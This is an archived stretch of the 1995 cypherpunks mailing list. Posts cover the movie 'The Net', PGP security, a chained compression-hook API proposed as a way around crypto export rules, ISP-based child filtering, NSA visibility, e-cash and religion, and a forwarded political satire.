provide that capability.  You'd have to get the irc client to use it.  
Don't know of any that do off the top of my head but I haven't looked for 
it either.  It wasn't much of a "hot" chat.  It could have been much 
steamier.  The sex content of this movie was pretty lame though...

> (If they all exchange so much e-mail, why do they bother FedExing diskettes?)

More secure to fedex a disk.  Nobody on the net can read what's not on 
the net. ;-)  Now if the author of this movie knew about pgp... totally 
different story.

> Interestingly, there's NO mention of crypto. Once you know someone's password,
> or have physical access to the media, you can read and write everything. Once
> you change some data, it's changed. No digital signatures.

Yeah, that was quite bad.  

> In fact, the bad guys were selling everyone a computer security system called
> "the Gatekeeper" (a Trojan horse, really), but it's not identified as crypto.
> It sounded like access rights are checked by their server. It involves a Web
> page with a 'pi' symbol (pi stands for pretorian, of course). Clicking on the
> pi while pressing control-shift will display much hexadecimal stuff and then
> let the user in through a backdoor. Hmm. Gatekeeper = Bill Gates = Windows 95?
> Is that why Apple lent those Macs? :)

That was my impression too.

> There's a character named "CyberBob" who's never seen. He only hot-chats
> and eventually gets killed. His icon looks like MS Bob.

Yeah, death to MS-Bob...  >:-)

> I heard only one mention the "the Internet". At the end of the movie, a TV
> announcer says that the case was cracked because the "programmer analyst
> Angela Bennett e-mailed the evidence to the FBI from the Internet".
> (E-mailed from an open-access computer at a computer show, I might add)

Not unlikely.  A lot of trade shows do provide machines with net access 
as demos of the internet.  Though it's usually manned by the ISP and not 
out in the open.


=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:29:20 PDT
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: a hole in PGP
In-Reply-To: <199507312340.TAA02533@toxicwaste.media.mit.edu>
Message-ID: <Pine.BSD/.3.91.950803111851.12078F-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Agreed.  If PGP has a hole it in it's not in the sources, nor in the 
executables.  Any hole would be a breaking of the RSA or IDEA cyphers by 
the TLA's who wouldn't talk about it, or the availablity of enough super 
fast hardware to brute force it.

It wouldn't be that PGP, it's sources, or algorithms have holes.  It 
would be that there is a way to factor RSA that as of yet we don't know 
about.  And hell, that's as likely as meeting Elvis at your local 7-11. ;-)


=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:38:26 PDT
To: Andrew Spring <Andrew.Spring@ping.be>
Subject: Re: Australia next to ban PGP
In-Reply-To: <199508011940.VAA05285@ping1.ping.be>
Message-ID: <Pine.BSD/.3.91.950803112930.12078L-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Does this have anything to do with the fact that there's an NSA base 
smack in the middle of Australia?  (See Puzzle Palace)

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:48:35 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: building libraries
In-Reply-To: <199507310521.WAA08413@ix4.ix.netcom.com>
Message-ID: <Pine.BSD/.3.91.950803113122.12078M-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 30 Jul 1995, Bill Stewart wrote:

> If you did everything in an RSAREF-compatible manner, that would help;
> I think somebody outside the US has written an RSAREF-clone.
> Some problems include building programs that have generic-callout hooks
> instead of crypto-specific hooks (so that they don't get bitten by ITAR),
> while still maintaining reasonable efficiency and convenience.

One way to achieve this is to provide multi-layered generic "compression" 
hooks which get called in this manner:

 Compress[x](char *bufferin, size_t insize, char *bufferout, size_t *osize);

Then you chain several of these by alternating the in/out buffers, say 
something like this:

 for (i=0; i<MAXCOMPRESSORS; i+=2)
 {
  Compress[i](buffer1,size1,buffer2,&size2);
  Compress[i+1](buffer2,size2,buffer1,&size1);
 }

To decompress, you'd do something like this:

 for (i=MAXCOMPRESSORS-1; i; i-=2)
 {
  Decompress[i+1](buffer2,size2,buffer1,&size1);
  Decompress[i](buffer1,size1,buffer2,&size2);
 }

This lets you set up a chain of compressors, each compressing the output 
of the previous levels.  And what you do is allow these compressors to be 
external to the program!  (If one or more of those should be hooks to 
encrypt, well, hey, that's just a 'bug' ;-)

Basically this does C1(C2(C3(C4...CN(text)))))...) to compress the output of 
the previous compressors.  I would reccomend that the last in the set be 
the encryptors or else all the other compressors would fail. :-)

Now, would >THAT< be exportable?

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:49:52 PDT
To: Alex Tang <altitude@CIC.Net>
Subject: Re: building libraries
In-Reply-To: <199507311348.JAA04346@petrified.cic.net>
Message-ID: <Pine.BSD/.3.91.950803114050.12078N-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perhaps we could convince Bill Gates to bundle RSAREF with all his 
Windoze OS's?  Ditto for Apple?

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 3 Aug 95 11:46:57 PDT
To: cypherpunks@toad.com
Subject: Re: NYETSCAPE
Message-ID: <199508031844.LAA05026@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In a copyrighted article,
>Copyright 1995, Nathan Zook.  All rights reserved.
Nathan discusses his suggested directions for elder-controlled
filtering of kids' net access.  (Could be parents, or schoolocrats in loco.)

>The system is of necessity ISP-based.  Home-based systems are subject to
attacks
That's probably necessary; it's certainly the efficient way.  A third approach
is Exon's "Censor the whole net, unless perverts can find ways to talk to
each other without any chance of kids hearing them", which is morally
unacceptable.
The interesting question is how much overlap develops between this and emerging
reputation/filtering services for adults, for which the filtering criteria are
interestingness-related rather than offensiveness-related.

> [ multiple rating services ]
Yep.  For market reasons, as well as moral, aesthetic, and practical ones.

>The NYET-software runs as superuser on the ISP's machine. [...]
>The parent sets the configuration file to permit and deny access to
>various parts of the net.  
And any kid who can break that dialog (e.g. by tapping the parent's session
to get the parent's password) won't be stopped by any wimpy restrictions :-)

An important consideration is that filtering has to be application-specific.
Some sites can be cut off entirely (presumably *.penthouse.com),
but most filtering needs to be more granular, and has different time-scales.
You're certainly not going to block access to the whole Library of CONgress
just because there are a few dirty book titles in the on-line card catalog.

For instance, ftp files and static web pages are pretty easy to rate and filter
if you've got a herd of adults to go surfing them.  
Dynamic web pages are tougher - do you default to open access,
closed-unless-rated, or just use a no-dirty-words-and-no-pictures blocker?

Usenet - some newsgroups obviously would get blocked, 
some would get individual articles filtered by humans,
and technical groups would probably with automatic filters to censor certain
posters and certain words, with occasional human monitoring to detect 
the occasional uses of comp.nerdy.detailed or comp.binaries.eniac for
posting pornography or whatever.  Filtering does slow down conversation,
but enough paid moderators could probably keep up.

But what about chat-programs, IRC, etc.?  You really _can't_ censor
that stuff in real-time and have a meaningful flow of conversation,
except for trivial dirty-word filters which can be exonized around.
Sure, you could have adults watching to say "Hey, cut that out down there!",
and making sure channel names don't have politically incorrect words in them.
And maybe you can have kids-only chat rooms - but what happens when
the kids either start talking like Beavis and [Exon'd]head, or
start talking about (gasp!) sex or (double-gasp!) sexual orientation?
Do you tell their mom? 

And then there are wide-open technologies like telnet (which can do 
almost anything) and email (slower, but goes everywhere) - do you
try to restrict those?  

One major technology that would be needed for this sort of application
is authentication, whether it's digital-signature-based or just
automatic packet-labelling with applications that maintain labels,
so that you can be sure who posted what within PoliticallyCorrectNet,
know whose mom to call if little FooBar has been misbehaving, whose posting
privileges to block or reading to restrict if their mom grounds them,
or, on the positive side, to encourage people to take responsibility for
their postings and remind them that this kind of service only works
if everybody agrees, up-front, to be Good Citizens.

But how do you manage this technically - require outgoing connections
to all go through proxies?  (You need firewalls anyway.)
But do you require connections from users to go through an authentication
proxy before connecting to internal destinations as well,
or is it adequate to use IPv6 with mandatory authentication and
only add proxy service where it's needed?

And what about encryption?  (And stego?  Do some of those MIDI postings have
NASTY WORDS in them if you play them BACKWARDS?  Oh, no!)
We probably need to understand the politics of this sort of service
to find a way to position encryption as a Good Thing, probably as
part of the authentication system - there's a very high risk that it'd
either be banned, or at least Clipperized with a hierarchical authentication
system.  

Of course, if you're banning encryption, or just trying to monitor what's
going on on the net, there's the language problem - English and Spanish
are a start, but it's probably hard for the average ISP to have the 
right mix of people to tell whether an IRC channel is really
speaking Finnish or Hawai'ian or Tuvan or whether it's just stego.
This is probably a Good Thing - while some services will probably
restrict the languages that people post in (either because they're
Real American monoculturalists or because they're providing a
heavily-monitored service and don't have the bucks for 5000 languages), 
others will be pushed toward encouraging responsibility instead.

>I feel it necessary to reiterate the importance of the government
>waiting for a market solution to this problem. 

Yeah!
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Thu, 3 Aug 95 08:48:35 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: NYET--attempted formal specs (again)
In-Reply-To: <Pine.SUN.3.91.950803104530.165A-100000@rwd.goucher.edu>
Message-ID: <Pine.SUN.3.91.950803112903.27691A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Jon Lasser wrote:

> On Wed, 2 Aug 1995, Timothy C. May wrote:
> 
> > In fact, most religious groups are distrustful of "The Gubment" deciding
> > what's reasonable and what's not.
> 
> Unless, of course, at that moment they happen to BE "The Gubment."
> 
> Not always then, but sometimes.
> 
> Jon

Precisely.  *Everyone* hates the government--everyone outside of it, that
is.  Anarchist/libertarian types are often too quick to accept people or
groups as "one of us" just because they're "against the government," 
whatever that means.  Most of them are just waiting to gain power, at
which time their true agenda will become clear soon enough, if it isn't 
already.

The relevant example here is the religious fundamentalist kook Pat
Robertson, who IMHO cypherpunks are a little too quick to accept at his
word.  Robertson holds some pretty blatantly fascistic views--and this is
not hyperbole.  See for example the long piece about him in the New York
Review of Books a few months back.  A journalist friend of mine is also
working on a piece about one of Robertson's gurus--a fascist (again, no
exaggeration) from the 30's or 40's whose book Robertson quotes from on a
regular basis.  I've seen the book in question, and it's pretty strong
stuff.  When I learned about this connection I wasn't particularly
surprised. 

Personally, I don't care whether Robertson has opposed Clipper or not.  I 
won't complain, I guess, but it doesn't change my views on him.  I'm sure 
many serial killers and neo-nazis opposed Clipper too.  Fine, but it 
doesn't exactly make us best buds.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Thu, 3 Aug 95 09:03:46 PDT
To: cypherpunks@toad.com
Subject: Re: "Codebreakers" on PBS in NYC????
In-Reply-To: <Pine.BSD/.3.91.950803105116.12078B-100000@escape.com>
Message-ID: <Pine.SUN.3.91.950803120250.3920A-100000@frog.zoo2.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


> > bart@netcom.com (Harry Bartholomew) writes:
> > 
> > >     For the Bay Area, on KQED at 8 p.m. Tuesday. The NOVA show
> > >     "The World War II codebreaking efforts known as Enigma and Purple"
> > 
> > If this is the rerun of the show Nova had in march 94, then I highly
> > recommend it.  I taped it and showed it to the undergrad class on computer
> > security I taught that semester.  The kids loved it.

IS there anyone out there that can copy this for me?  I'd be glad to mail 
you an extra VHS tape for your effort.

BEn.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 09:23:12 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Noise: PBS under the Republicans (fwd)
Message-ID: <Pine.BSD/.3.91.950803121435.12078o-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



Date: Sun, 30 Jul 1995 11:09:47 -0400
From: Sal Denaro <Sal@panix.com>
To: sunder@escape.com
Subject: PBS under the Republicans 

// Ray, you may want to forward this to the list.

  --------------------------------
A TYPICAL DAILY PBS SCHEDULE IF THE PUBLIC BROADCASTING LEADERS CAVE IN
TO REPUBLICAN PRESSURE

8:00 am  Morning Stretch:  Arnold Schwarzenegger does squats while
reciting passages of "Atlas Shrugged."

9:00 am  Mr. Rogers' Segregated Neighborhood:  King Friday sings
"Elitism is neat."  The House Un-American Activities investigation of
Mr. McFeely continues.  Mr. Rogers explains why certain kids can't be
his neighbor.

10:00 am  Sesame Street:  Jerry Falwell teaches Big Bird to be more
judgemental.  Oscar the Grouch plays substitute for Rush Limbaugh.  Bert
and Ernie are kicked out of the military.  Jesse Helms bleaches all the
Muppets white.

11:00 am  Square One:  A MathNet episode "Ernest Does Trickle-Down."
Jim Varney explains how cutting taxes for the rich and spending more on
defense will balance the budget.

Noon  Washington Week in Review:  Special guest Senator Bob Dole,
explaining why the current pension crisis, budget deficit, bank
closings, farm foreclosures, S & L bailouts, inflation, recession, job
loss, and trade deficit can all be blamed on someone else.

1:00 pm  Where in the world is Carmen San Diego?  Guest detective Pat
Buchanan helps kids build a wall around the U.S.

2:00 pm William F. Buckley's Firing Line:  Guests George Will, Rush
Limbaugh, John Sununu, Pat Buchanan, James Kilpatrick, Mona Charen, G.
Gordon Liddy, Robert Novak, Bay Buchanan, Pat Robertson, Joseph Sobran,
Paul Harvey, Phyllis Schafly, Maureen Reagan, and John McLaughlin bemoan
the need for more conservative media voices.

3:00 pm  Nature:  Join James Watt and Charlton Heston as they use
machine guns to bag endangered species.

4:00 pm  NOVA:  "Creationism:  Discredited, but what the hell?"

5:00 pm  Newt Ginrich News Hour:  Clarence Thomas and Bob Packwood
present in-depth personal reports on sexual harassment.  Pat Buchanan
says he is being shut out from national exposure.

6:00 pm  Mystery Theater:  Hercule Poirot, Jane Marple, and Sherlock
Holmes team up to investigate Whitewater.

7:00 pm  Great Performances:  Pat Buchanan is a guest conductor of
Wagner's "Prelude to a Cultural War."

8:00 pm  Masterpiece Theater:  Ibsen's "A Doll's House."  Phyllis
Schafly adds to this classic with an added scene where Nora gladly gives
up her independence while her husband chains her to the stove.

9:30 pm  Washington Week in Review:  Guests George Will, Rush Limbaugh,
John Sununu, Pat Buchanan, James Kilpatrick, Mona Charen, G. Gordon
Liddy, Robert Novak, Bay Buchanan, Pat Robertson, Joseph Sobran, Paul
Harvey, Phyllis Schafly, Maureen Reagan, and John McLaughlin discuss
liberal media bias.

10:00 pm  Adam Smith's Money World:  How to Profit from Ozone Depletion

10:30 pm   Nightly Business Report:  Wall Street celebrates the end of
all laws regarding antitrust, consumer protection, work-place safety,
environmental protection, minimum wage and child labor.

11:00 pm  Insights of Dan Quayle

11:01 pm Sign-Off








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 3 Aug 95 09:37:01 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: Noise: PBS under the Republicans (fwd)
In-Reply-To: <Pine.BSD/.3.91.950803121435.12078o-100000@escape.com>
Message-ID: <199508031636.MAA00571@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



What, exactly, does this have to do with cryptography?

.pm

Ray Arachelian writes:
> Date: Sun, 30 Jul 1995 11:09:47 -0400
> From: Sal Denaro <Sal@panix.com>
> To: sunder@escape.com
> Subject: PBS under the Republicans 
> 
> // Ray, you may want to forward this to the list.
> 
>   --------------------------------
> A TYPICAL DAILY PBS SCHEDULE IF THE PUBLIC BROADCASTING LEADERS CAVE IN
> TO REPUBLICAN PRESSURE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Thu, 3 Aug 95 10:10:16 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
In-Reply-To: <199508021251.IAA08192@detroit.freenet.org>
Message-ID: <199508031709.NAA29005@colon.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook writes:
 > > And is there any way to build trusted system out of small, verifiable
 > > pieces?  Since the way they're connected could also be questioned, I
 > > suspect that when you put enough of them together it's just as bad as
 > > the case of a single, monolithic program.  But this isn't my area, so
 > > I don't know.
 > 
 > No.  This was essentially proved during the first third of this century.

Well, I haven't gotten a reply from Nathan Zook on this assertion, so
can anyone else back it up with some references? Perhaps we're
discussing different contexts, but proving correct systems composed of
correct components is still a subject of active research.

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 3 Aug 95 10:46:15 PDT
To: cypherpunks@toad.com
Subject: EU Data Protection
Message-ID: <199508031725.NAA27264@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Could I bother the members of this list with a request that anyone who has a
copy of (this week's or a recent) Computerworld, look and see if I'm quoted
in an article by Mitch Betts on the European Union's humorous decree on
Euro-wide data protection.  I was interviewed last Thursday.  The decree
(July 24th) threatens to cut off data flows to any nation that doesn't adopt
Eurosclerotic data protection standards.  It will be quite humorous when
their Visa and ATM authentications start to fail.

DCF

"Member of the "unorganized militia of the US" who was going to make it to
Waco in '93 but couldn't afford the 5,000 gallons of fuel for the turbine of
his M1A1."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 3 Aug 95 11:33:59 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: NYET--attempted formal specs (again)
In-Reply-To: <9508030905.AA15886@cs.umass.edu>
Message-ID: <Pine.3.89.9508031320.B15462-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 3 Aug 1995, Futplex wrote:

> Nathan Zook writes:
> > The NYET-software runs as superuser on the ISP's machine.  All minor
> > accounts have a corresponding configuration file sitting in their
> > account owner's parent's directory, which is locked with read/write by
> > owner only flags.  The correspondence between minor and parent
> > accounts sits in a file owned by root and similiarly locked.
> 
> Just a minor technical comment:
> Based on my rather limited experience lurking on the firewalls list, I
> believe the preferred security-conscious method of running such daemons
> involves _not_ giving them su/root privileges.  Dr. FBC's thttp, for example,
> runs as a user named, e.g., "www" with pretty ordinary privileges. They are
> also often run in a chroot()ed "jail", so that the process can't see any
> directories outside the tree artifically rooted in its home directory. You'd
> then need some mechanism for the `rents to submit configuration updates to
> the imprisoned daemon, I suppose.  Perhaps digitally-signed email....
> 
> -Futplex <futplex@pseudonym.com>
> "Before you started tokin' you used to have a brain, but now you don't get
> even the simplest of things...." -Offspring
> 

I bow before superior wisdom, such as this....

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 3 Aug 95 13:44:22 PDT
To: Childers James <liberty@gate.net>
Subject: NSA, NRO, and Keeping Secrets
Message-ID: <ac4682bd00021004c387@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:50 PM 8/3/95, Childers James wrote:

>I'm afraid I don't follow. Are you saying that the NSA is assuming a more
>public role because (apparently) stong crypto is now widely available to
>the public? I don't see the connection between A and B if this is what
>you are claiming.
>
>Unless they're gearing up for a PR campaign... I wonder how the NSA has
>been portrayed in Hollywood in the past. I've just seen them mentioned in
>one movie I can think about ("Crimson Tide"). Anyone else know of references?

The NSA has been mentioned in many recent movies, even in television shows
(like "The X Files"). I haven't been keeping a list, but the last Clancy
movie, "A Clear and Present Danger," had references. And in more than one
movie the reference to "NSA agents" doing various things is made.

The NSA has a high profile today. "No Such Agency" is clearly marked as an
exit on the Baltimore-Washington highway, and of course even has a museum
open to the public.

Even the National Reconnaissance Organization is public knowledge, partly
because of the Burrows book "Deep Black," and partly because of the
controversy over the huge building out near Dulles Airport.

Some things are mostly secret, though. The cover of Consular Operations was
almost blown some years back by former agent Ludlum, but ConsOps has faded
back into obscurity.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 3 Aug 95 11:22:19 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Object Oriented Crypto API
In-Reply-To: <199508031625.JAA11761@jobe.shell.portal.com>
Message-ID: <199508031821.OAA05692@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| I enjoyed Ray's message about the crypto library interface.  I haven't
| had time to study it closely, but I have a couple of quick comments:

	I thought it was very well done as well, with one ommission,
other than the one Hal noted.  There should be a compress function,
becuase messages should be compressed before encryption takes place.

	Giving the library a zip() call also makes it possible to
suggest the library in more circumstances.  When people ask 'where can
I snarf some compression code?' we can point them to a library that
does strong crypto as well.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Weisberger <jweis@primenet.com>
Date: Thu, 3 Aug 95 14:41:13 PDT
To: cypherpunks@toad.com
Subject: SSLeay - Whats the story...
Message-ID: <199508032140.OAA09085@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text


Maybe I miss it, but when did this arrive?  Is anyone testing it?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Thu, 3 Aug 95 14:47:04 PDT
To: "cypherpunks@toad.com>
Subject: 900# "Mind Your 0wn Business"
Message-ID: <199508032146.OAA15372@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

Howdy, y'all:

Remember when I said we should establish 900#s to sell
privacy information? Here's my attempt:

-----BEGIN PGP SIGNED MESSAGE-----

  ANNOUNCING: The "MIND YOUR 0WN BUSINESS" audiotext program. 
       1 - 9 0 0 - C A N - M Y 0 B  (1-900-226-6902)
           Note the zero digit, not the letter "O."

The Feds say you can't have privacy, but we say you CAN "Mind 
Your 0wn Business!" And now we have a 900 number to reveal new 
methods to defend your privacy from criminals and tyrants.

Sponsored by The Agorist Institute.

The cost of each call is just 99 cents per minute, average cost 
$2.97, average length 3 minutes. You must be at least 18 to call 
or have parental permission. (The total cost is less than what 
you'd be charged per minute on most psychic or sex lines).

The line will be updated by the 1st of each month. By September 
1, 1995, our message will be recorded by a professional audio 
producer, but for now, you get to hear me read the first script. 
Don't be surprised if we update it during August.

  Kent

J. Kent Hastings, Assistant Director of The Agorist Institute
zeus@pinsight.com -- http://www.pinsight.com/~zeus/agorist/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCE9ijTxxI221vktAQH9uQP+PmeMh8fAp6xFumDMnAE21GtWEq6eAtyd
YnQAAxsFrX6xOFFiZI9F7RSe5l82RzwcxFilh3U572bmWnfqq/lGmki/EcZOvOfV
EwY6Uxn59jxHeKzL/qYS0CgqmcIYfKWczDQdXahFStDu6nKFAMqYUMTr6Y4POEcp
/lZGVdkseD0=
=Q/hE
-----END PGP SIGNATURE-----
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy//L2kAAAEEAOnvjIRkD5n6TVQXPhVjZcgA5gWGkCcpa2Po8dpBWyQ/AHHU
c9FPDhYFz9jLnZPw/GCri6UvLEhMKCiUqvSp0tn9j4O06q4My1w8aKmNK6SZVCCB
2qcO4srPPOHsg/9lxEjwCZCYOmbNjOj8CSfSOxyleRfRD/8gpDTxxI221vktAAUR
tCRKLiBLZW50IEhhc3RpbmdzIDx6ZXVzQHBpbnNpZ2h0LmNvbT6JAJUDBRAwDy9e
ZDiKtuS2yAEBATW0A/9EC4tJsoMc6DZzimr4vWRuSXokP7jZinvmTPnB6VRTGMb2
mi+iGJri7cosGzfSPdza71jny0bofYh5D1T81l+w9tC2stKYpauXnXnM1kptinFy
ACVOcZlQgs76CWGp27FM3OxmX7NrCRi45a4B6Lp++8LvqSrWQhkfY0K8BZ37sIkA
lQMFEC//MEfebp7zC/wzWQEB+p8EAIhUH1Z7/y3K0wxMSHYeeQ+qLcK92XLdHCwA
uJ7TF68EfpROxwPAFk1IW6MBI2pM9QLj5vMdA3dIPXQUICAY2BhgmdCF74kYUzkA
XG+27B1298wcioUQgvZrsJ1Prl74o7Ta4T6rAjVWBeqUeOuV74prf0sI36aPiDJ5
vvGHt0i9
=RBUs
-----END PGP PUBLIC KEY BLOCK-----

It's rough now, but should become more useful in the next few months.

Kent
--
"Put pages for your business on the World Wide Web, just $5 per month!"
J. Kent Hastings -- zeus@pinsight.com -- http://www.pinsight.com/~zeus/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Thu, 3 Aug 95 12:48:31 PDT
To: "K. M. Ellis" <kelli@zeus.towson.edu>
Subject: Re: Pat Robertson Fears E-cash?
In-Reply-To: <Pine.ULT.3.91.950803144027.15377B-100000@zeus.towson.edu>
Message-ID: <Pine.SOL.3.91.950803144149.17899A-100000@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, K. M. Ellis wrote:

> On Wed, 2 Aug 1995, Peter Trei wrote:
> 
> > The relevant verses are in Revelations 13, where some of the actions
> > by which The Beast can be recognized are given. Among them are:
> > [Deletia]
> > 
> > E-cash is a bit of a reach from this, but some of them (eg, 
> > Robertson), extend the verses to cover all forms of trackable 
> > transactions. I suspect that if someone could get him to realize the 
> > privacy aspects of true anonymous ecash, he'd like it.

> I read in the New York Times that a lot of fundamentalist Christians fear 
> the e-cash revolution because they believe that eventually everyone will 
> be required to bear a tattooed bar code on their right hand which 
> would contain all a person's information:  name, d.o.b., birthplace, 
> etc.  

Crapola. They fear the unknown, and read their own personal prejudices 
and beliefs into something they don't understand. Maybe I'll start going 
to church <shudder> and explain to the believers about the benefits of 
crypto *against* such Revalationary measures. I'm sure they would be 
interested in the work Chaum has done regarding truly anonymous 
transactions.

Hell, maybe we could set up a Dining Christians net.

"Freedom is meaningless unless  | ic58@jove.acs.unt.edu - James Childers
 you can give to those with whom| No man's freedom is safe
 you disagree." - Jefferson     |    while Congress is in session
        EA 73 53 12 4E 08 27 6C   21 64 28 51 92 0E 7C F7





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
